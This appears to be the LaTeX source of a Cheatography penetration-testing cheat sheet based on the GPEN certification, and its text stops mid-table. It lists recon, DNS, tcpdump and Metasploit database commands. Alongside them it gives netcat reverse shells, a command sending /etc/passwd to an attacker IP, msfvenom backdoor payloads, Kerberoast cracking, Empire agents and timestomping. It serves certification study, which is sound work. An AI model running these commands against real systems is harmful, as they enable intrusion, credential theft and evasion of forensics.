\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{Hey Mensh (HeyMensh)} \pdfinfo{ /Title (pentest-command-tools-gpen-based.pdf) /Creator (Cheatography) /Author (Hey Mensh (HeyMensh)) /Subject (Pentest command Tools (GPEN Based) Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{4A4A4A} \definecolor{LightBackground}{HTML}{F3F3F3} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Pentest command Tools (GPEN Based) Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{Hey Mensh (HeyMensh)} via \textcolor{DarkBackground}{\uline{cheatography.com/150100/cs/32550/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}Hey Mensh (HeyMensh) \\ \uline{cheatography.com/heymensh} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Published 23rd November, 2022.\\ Updated 23rd November, 2022.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{2} \begin{tabularx}{8.4cm}{x{3.52 cm} x{4.48 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{General Reconn}} \tn % Row 0 \SetRowColor{LightBackground} `fping -g x.x.x.0 x.x.x.254 -a` & {\bf{Ping}} sweep \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Linux traceroute Options}}} \tn % Row Count 3 (+ 1) % Row 2 \SetRowColor{LightBackground} `-4` & Forces IPv4 \tn % Row Count 4 (+ 1) % Row 3 \SetRowColor{white} `-6` & Forces IPv6, same as traceroute6 command \tn % Row Count 6 (+ 2) % Row 4 \SetRowColor{LightBackground} `-I` & Uses ICMP echo \tn % Row Count 7 (+ 1) % Row 5 \SetRowColor{white} `-T` & Uses TCP SYN \tn % Row Count 8 (+ 1) % Row 6 \SetRowColor{LightBackground} `-f \textless{}first\_ttl\textgreater{}` & Starts from the hop specified instead of 1 \tn % Row Count 10 (+ 2) % Row 7 \SetRowColor{white} `-g \textless{}gateway\textgreater{}` & Routes packets through the gateway specified instead of the default \tn % Row Count 14 (+ 4) % Row 8 \SetRowColor{LightBackground} `-m \textless{}max\_ttls\textgreater{}` & Specifies the maximum number of hops; default is 30 \tn % Row Count 17 (+ 3) % Row 9 \SetRowColor{white} `-n` & Specifies not to resolve IP address to hostnames \tn % Row Count 20 (+ 3) % Row 10 \SetRowColor{LightBackground} `-w \textless{}wait\textgreater{}` & Specifies the wait time, which can be in seconds or relative to the reply time between hops \tn % Row Count 25 (+ 5) % Row 11 \SetRowColor{white} `-p \textless{}port\textgreater{}` & Specifies the port \tn % Row Count 26 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{DNS Query}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{nslookup}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `nslookup -norecurse -type=A google.com DNS\_SRVR\_IP` & DNS Snooping | nonrecursive query \tn % Row Count 4 (+ 3) % Row 2 \SetRowColor{LightBackground} `server {[}serverIPaddr or name{]}` & use specific server \tn % Row Count 6 (+ 2) % Row 3 \SetRowColor{white} `set type=any` & set DNS record type \tn % Row Count 7 (+ 1) % Row 4 \SetRowColor{LightBackground} `ls -d {[}target\_domain{]}` & Perform a zone transfer of all records for a given domain \tn % Row Count 10 (+ 3) % Row 5 \SetRowColor{white} `ls -d {[}target\_\_domain{]} {[}\textgreater{} filename{]}` & Store zone transfer output in a file \tn % Row Count 12 (+ 2) % Row 6 \SetRowColor{LightBackground} `view {[}filename{]}` & view file \tn % Row Count 13 (+ 1) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{dig} \tn % Row Count 14 (+ 1) % Row 8 \SetRowColor{LightBackground} `dig @{[}name server{]} {[}domain name{]} {[}record type{]}` & dig comand syntax \tn % Row Count 17 (+ 3) % Row 9 \SetRowColor{white} `dig +nocomments @192.168.1.50 lab.local -t AXFR` & test if allows anonymous zone transfers \tn % Row Count 20 (+ 3) % Row 10 \SetRowColor{LightBackground} set norecurse & no recursive query, RD=0 \tn % Row Count 22 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Netcat}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Flags}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `-l` & Listen mode (default is client) \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} `-L` & Listen harder (Windows only) — Make a persistent listener \tn % Row Count 6 (+ 3) % Row 3 \SetRowColor{white} `-u` & UDP mode (defaultis TCP) \tn % Row Count 8 (+ 2) % Row 4 \SetRowColor{LightBackground} `-p` & Local port (In listen mode, this is port listened connections on. In client mode, this is source port for packets sent.) \tn % Row Count 14 (+ 6) % Row 5 \SetRowColor{white} `-e \textless{}filename\textgreater{}` & Program to execute after connection occurs \tn % Row Count 17 (+ 3) % Row 6 \SetRowColor{LightBackground} `-n` & Don't resolve names \tn % Row Count 19 (+ 2) % Row 7 \SetRowColor{white} `-z` & Zero—I/O mode: Don't send any data, just emit packets \tn % Row Count 22 (+ 3) % Row 8 \SetRowColor{LightBackground} `-w{[}N{]}` & Timeout for connects, waits for N seconds \tn % Row Count 25 (+ 3) % Row 9 \SetRowColor{white} `-v` & Be verbose, printing when a connectionis made \tn % Row Count 28 (+ 3) % Row 10 \SetRowColor{LightBackground} `nc -e` & executes a command upon connection \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Netcat (cont)}} \tn % Row 11 \SetRowColor{LightBackground} `-vv` & Be verbose, printing when connections are made, dropped, and so on \tn % Row Count 4 (+ 4) % Row 12 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{General}}} \tn % Row Count 5 (+ 1) % Row 13 \SetRowColor{LightBackground} `nc -lvnp XX` & Server listen, verbosity,noDNS,on port XX \tn % Row Count 8 (+ 3) % Row 14 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{SHELLS}}} \tn % Row Count 9 (+ 1) % Row 15 \SetRowColor{LightBackground} `nc IP PORT -e /bin/bash` & Client reverse shell \tn % Row Count 11 (+ 2) % Row 16 \SetRowColor{white} `rm -f /tmp/f ; mkfifo /tmp/f ; cat /tmp/f|/bin/sh -i 2\textgreater{}\&1|nc \$RHOST \$RPORT \textgreater{}/tmp/f` & netcat -e alternative example \tn % Row Count 16 (+ 5) % Row 17 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{On target:} \tn % Row Count 17 (+ 1) % Row 18 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`mknod backpipe p`} \tn % Row Count 18 (+ 1) % Row 19 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`nc -{}-1 -p {[}allowed\_inbound\_port{]} 0\textless{}backpipe | nc 127.0.0.1 22 1\textgreater{}backpipe`} \tn % Row Count 20 (+ 2) % Row 20 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{Attackers machine to connect:} \tn % Row Count 21 (+ 1) % Row 21 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`ssh login\_name@{[}targetmachine{]} -p {[}allowed\_inbound\_port{]}`} \tn % Row Count 23 (+ 2) % Row 22 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{A really good explanation for this is on 560.3 book, P 152} \tn % Row Count 25 (+ 2) % Row 23 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Send Files}}} \tn % Row Count 26 (+ 1) % Row 24 \SetRowColor{white} `nc -l -p 8080 \textgreater{} filename` & setup listener and output file \tn % Row Count 28 (+ 2) % Row 25 \SetRowColor{LightBackground} `nc -w 3 attackerIP 8080 \textless{} /etc/passwd` & sends file to netcat listener with 3 secs timeout \tn % Row Count 31 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Netcat (cont)}} \tn % Row 26 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Scan ports}}} \tn % Row Count 1 (+ 1) % Row 27 \SetRowColor{white} `nc -v -n IP port` & test 1 port \tn % Row Count 2 (+ 1) % Row 28 \SetRowColor{LightBackground} `nc -v -w 2 -z IP\_Address port\_range` & port range \tn % Row Count 4 (+ 2) % Row 29 \SetRowColor{white} `echo "" | nc -v -n —w1 {[}targetIP{]} {[}port—range{]}` & a port scanner that harvests banners \tn % Row Count 7 (+ 3) % Row 30 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Other Uses}}} \tn % Row Count 8 (+ 1) % Row 31 \SetRowColor{white} `while (true); do no -vv -z -w3 {[}targeb\_IP{]} {[}target\_port{]} \textgreater{} /dev/null \&\& echo -e "\textbackslash{}x07"; sleep 1; done` & Service-is-alive heartbeat \tn % Row Count 14 (+ 6) % Row 32 \SetRowColor{LightBackground} `while \textbackslash{}`nc —vv -z —w3 {[}target\_IP{]} {[}target\_port{]} \textgreater{} /dev/null\textbackslash{}` ;do echo "Service is ok"; sleep 1; done; echo "Service is dead"; echo —e "\textbackslash{}x07" ` & Service-ls-Dead Notification \tn % Row Count 22 (+ 8) % Row 33 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{alternative}}} \tn % Row Count 23 (+ 1) % Row 34 \SetRowColor{LightBackground} `nc -n -v -l -p 2222 \textless{} /tmp/winauth.pcap` & Setup listener that will send the file \tn % Row Count 26 (+ 3) % Row 35 \SetRowColor{white} `nc.exe -n -v -w3 {[}YourLinuxIPaddr{]} 2222 \textgreater{}C:\textbackslash{}folder\textbackslash{}winauth.pcap` & Client to capture and save the file \tn % Row Count 30 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.04 cm} x{4.96 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{TCPDUMP | Monitoring}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{General}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `tcpdump -nnv -i eth0` & start capturing traffic \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} `-n` & Use numbers instead of names for machines \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} `-nn` & Use numbers for machines and ports \tn % Row Count 7 (+ 2) % Row 4 \SetRowColor{LightBackground} `-i` & Sniff on a particular interface (—D lists interfaces) \tn % Row Count 10 (+ 3) % Row 5 \SetRowColor{white} `-v` & Be verbose \tn % Row Count 11 (+ 1) % Row 6 \SetRowColor{LightBackground} `-w` & Dump packets to a file (use —r to read file later) \tn % Row Count 14 (+ 3) % Row 7 \SetRowColor{white} `-x` & Print hex \tn % Row Count 15 (+ 1) % Row 8 \SetRowColor{LightBackground} `-X` & Print hex and ASCII \tn % Row Count 16 (+ 1) % Row 9 \SetRowColor{white} `-A` & Print ASCII \tn % Row Count 17 (+ 1) % Row 10 \SetRowColor{LightBackground} `s {[}snaplen{]}` & Sniff this many bytes from each frame, instead of the defaul \tn % Row Count 20 (+ 3) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Protocol:}}} \tn % Row Count 21 (+ 1) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`ether, ip, ip6 , arp, rarp, tcp, udp: protocol type`} \tn % Row Count 23 (+ 2) % Row 13 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Type:}}} \tn % Row Count 24 (+ 1) % Row 14 \SetRowColor{LightBackground} `host {[}host{]}` & Only give me packets to or from that host \tn % Row Count 26 (+ 2) % Row 15 \SetRowColor{white} `net {[}network{]}` & Only packets for a given network \tn % Row Count 28 (+ 2) % Row 16 \SetRowColor{LightBackground} `port {[}portnum{]}` & Only packets for that port \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.04 cm} x{4.96 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{TCPDUMP | Monitoring (cont)}} \tn % Row 17 \SetRowColor{LightBackground} `portrange {[}start—end{]}` & Only packets in that range of ports \tn % Row Count 2 (+ 2) % Row 18 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Direction:}}} \tn % Row Count 3 (+ 1) % Row 19 \SetRowColor{LightBackground} `src` & Only give me packets from that host or port \tn % Row Count 5 (+ 2) % Row 20 \SetRowColor{white} `dst` & Only give me packets to that host \tn % Row Count 7 (+ 2) % Row 21 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Use `and` / `or` to combine these together} \tn % Row Count 8 (+ 1) % Row 22 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{Wrap in parentheses to group elements together} \tn % Row Count 9 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Hashcat}} \tn % Row 0 \SetRowColor{LightBackground} `hashcat -m 1800 -a 0 -o found1.txt crack1.hash 500\_passwords.txt` & crack {\bf{Linux SHA512}} password with dict \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} `hashcat -{}-force -m 13100 -a 0 lab3.hashcat /path/to/Dict.txt -{}-show` & Crack {\bf{Kerberos Service Ticket}} for account password \tn % Row Count 8 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{2.56 cm} x{5.44 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{PowerSploit/PowerView}} \tn % Row 0 \SetRowColor{LightBackground} \seqsplit{`Invoke-Kerberoast`} & Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes \tn % Row Count 4 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.92 cm} x{4.08 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metasploit}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Create Handler listener}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`use exploit/multi/handler`} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`set payload \seqsplit{windows/x64/meterpreter/reverse\_https`} OR \seqsplit{`windows/meterpreter/reverse\_tcp`}} \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`set lhost AttackerIP`} \tn % Row Count 5 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`set lport 443`} \tn % Row Count 6 (+ 1) % Row 5 \SetRowColor{white} `exploit -j -z` & Run in ackground \tn % Row Count 7 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{PS Session with valid creds}}} \tn % Row Count 8 (+ 1) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`use \seqsplit{auxiliary/admin/smb/psexec\_command`}} \tn % Row Count 9 (+ 1) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`set smbuser user`} \tn % Row Count 10 (+ 1) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`set rhost victimIP`} \tn % Row Count 11 (+ 1) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`set smbpass P4\$\$`} \tn % Row Count 12 (+ 1) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`set command "ipconfig or any command"`} \tn % Row Count 13 (+ 1) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`run`} \tn % Row Count 14 (+ 1) % Row 13 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Create backdoor - recognized by Defender :( }}} \tn % Row Count 15 (+ 1) % Row 14 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`msfvenom -p \seqsplit{windows/shell/reverse\_tcp} LHOST= {[}AttackerIP{]} LPORT=8080 -f exe \textgreater{} /tmp/file.exe`} \tn % Row Count 17 (+ 2) % Row 15 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`msfvenom -p \seqsplit{windows/x64/meterpreter\_reverse\_https} LHOST=AttackerIP LPORT=443 -f exe -o pwned.exe`} \tn % Row Count 19 (+ 2) % Row 16 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Others}}} \tn % Row Count 20 (+ 1) % Row 17 \SetRowColor{white} `sessions -l` & get a list of sessions \tn % Row Count 22 (+ 2) % Row 18 \SetRowColor{LightBackground} `sessions -i {[}N{]}` & interact (-i) with session number {[}N{]} \tn % Row Count 24 (+ 2) % Row 19 \SetRowColor{white} `press CTRL-Z` & Background session \tn % Row Count 25 (+ 1) % Row 20 \SetRowColor{LightBackground} `jobs` & get background jobs \tn % Row Count 26 (+ 1) % Row 21 \SetRowColor{white} `db\_import \seqsplit{/path/to/file/nmap.xml`} & Import scans from nmap \tn % Row Count 28 (+ 2) % Row 22 \SetRowColor{LightBackground} `hosts -m "Windows 10" 192.168.1.10` & Add comment to host \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.92 cm} x{4.08 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metasploit (cont)}} \tn % Row 23 \SetRowColor{LightBackground} `services -u -p 135,445` & Show UP hosts with Lports 135,445 \tn % Row Count 2 (+ 2) % Row 24 \SetRowColor{white} `sessions -h` & list help for sessions command \tn % Row Count 4 (+ 2) % Row 25 \SetRowColor{LightBackground} `sessions -K` & kill a session \tn % Row Count 5 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Empire}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{set up an Empire HTTP listener}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`usestager windows/launcher\_bat`} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`set Listener http`} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`execute`} \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`General`} \tn % Row Count 5 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`list agents`} \tn % Row Count 6 (+ 1) % Row 6 \SetRowColor{LightBackground} `interact AGENTID` & chose an agent \tn % Row Count 7 (+ 1) % Row 7 \SetRowColor{white} `download C:\textbackslash{}Users\textbackslash{}alice\textbackslash{}Desktop\textbackslash{}some.txt` & transfer file from agentPC \tn % Row Count 10 (+ 3) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Timestomping}}} \tn % Row Count 11 (+ 1) % Row 9 \SetRowColor{white} `upload /tmp` & upload content from /tmp to actual session directory \tn % Row Count 14 (+ 3) % Row 10 \SetRowColor{LightBackground} `usemodule \seqsplit{management/timestomp`} & load timestomp module \tn % Row Count 16 (+ 2) % Row 11 \SetRowColor{white} `set ALL 03/02/2020 5:28 pm` & define time to be set in all datetime file properties \tn % Row Count 19 (+ 3) % Row 12 \SetRowColor{LightBackground} `set FilePath \seqsplit{bank\_login\_information}.txt` & set target file to be tampered \tn % Row Count 22 (+ 3) % Row 13 \SetRowColor{white} `execute` & run module \tn % Row Count 23 (+ 1) % Row 14 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Others}}} \tn % Row Count 24 (+ 1) % Row 15 \SetRowColor{white} \seqsplit{`/opt/Empire-master/downloads/`} & Empire Download's location \tn % Row Count 26 (+ 2) % Row 16 \SetRowColor{LightBackground} `sell powershell Get-ChildItem` & Run powershell command \tn % Row Count 28 (+ 2) % Row 17 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{General}}} \tn % Row Count 29 (+ 1) % Row 18 \SetRowColor{LightBackground} ? & Get command suggestions \tn % Row Count 31 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Empire (cont)}} \tn % Row 19 \SetRowColor{LightBackground} searchmodule privesc & search for modules \tn % Row Count 1 (+ 1) % Row 20 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{configure a listener}}} \tn % Row Count 2 (+ 1) % Row 21 \SetRowColor{LightBackground} listeners & getting a list of our listeners \tn % Row Count 4 (+ 2) % Row 22 \SetRowColor{white} options & options we have for our listeners \tn % Row Count 6 (+ 2) % Row 23 \SetRowColor{LightBackground} set StagingKey {[}Some\_Secret\_Value{]} & configure a custom staging key for encrypting communications \tn % Row Count 9 (+ 3) % Row 24 \SetRowColor{white} set DefaultDelay 1 & time between callbacks from our agent \tn % Row Count 11 (+ 2) % Row 25 \SetRowColor{LightBackground} execute & launch listener \tn % Row Count 12 (+ 1) % Row 26 \SetRowColor{white} list & check out our listene \tn % Row Count 14 (+ 2) % Row 27 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{deploy an agent}}} \tn % Row Count 15 (+ 1) % Row 28 \SetRowColor{white} usestager & create and deploy an agent | {[}space{]}{[}TAB-TAB{]} To see available stagers \tn % Row Count 19 (+ 4) % Row 29 \SetRowColor{LightBackground} usestager 1auncher\_bat & select stager \tn % Row Count 21 (+ 2) % Row 30 \SetRowColor{white} info & get info for actual stager \tn % Row Count 23 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{MSFDB - Metasploit Database}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Most useful database commands}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} `db\_connect {[}connect\_string{]}` & Connects to a database \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} `db\_disconnect` & Disconnects from database \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} `db\_driver` & Selects the database type \tn % Row Count 7 (+ 2) % Row 4 \SetRowColor{LightBackground} `db\_status` & Displays the status of the database \tn % Row Count 9 (+ 2) % Row 5 \SetRowColor{white} `db\_export` & Exports database contents into a file, either xml (with hosts,ports, vulnerabilities, and more) or pwdump (with pilfered credentials) \tn % Row Count 16 (+ 7) % Row 6 \SetRowColor{LightBackground} `hosts` & Get list of hosts disvcovered \tn % Row Count 18 (+ 2) % Row 7 \SetRowColor{white} `vulns` & Get list of vulns that were found in scanned hosts \tn % Row Count 21 (+ 3) % Row 8 \SetRowColor{LightBackground} `services` & Get list of services running in gained hosts \tn % Row Count 24 (+ 3) % Row 9 \SetRowColor{white} `hosts -{}-add {[}host{]}` & manually add hosts \tn % Row Count 25 (+ 1) % Row 10 \SetRowColor{LightBackground} `services -{}-add -p {[}port{]} -r {[}proto{]} -s {[}name{]} {[}hostl,host2,...{]}` & manually add services running in hosts \tn % Row Count 29 (+ 4) % Row 11 \SetRowColor{white} `notes -{}-add -t {[}type{]} -n '{[}note\_text{]}' {[}hostl,host2,...{]}` & manually add notes to a host \tn % Row Count 32 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{MSFDB - Metasploit Database (cont)}} \tn % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{If you delete a host, any services and vulns corresponding to that host\_id will also disappear} \tn % Row Count 2 (+ 2) % Row 13 \SetRowColor{white} `db\_nmap -{}-sT 10.10.10.10 -{}-packet—trace` & invoke Nmap directly from the msfconsole \tn % Row Count 5 (+ 3) % Row 14 \SetRowColor{LightBackground} `db\_import {[}filename{]}` & import data | automatically recognizes the file type like Nmap xml, Amap, Nexpose, Qualys, Nessus \tn % Row Count 10 (+ 5) % Row 15 \SetRowColor{white} `hosts -S linux` & searching for any hosts associated with linux, -S works for other items (vulns) as well \tn % Row Count 15 (+ 5) % Row 16 \SetRowColor{LightBackground} `hosts -S linux -R` & set result as RHOTS variable value \tn % Row Count 17 (+ 2) % Row 17 \SetRowColor{white} 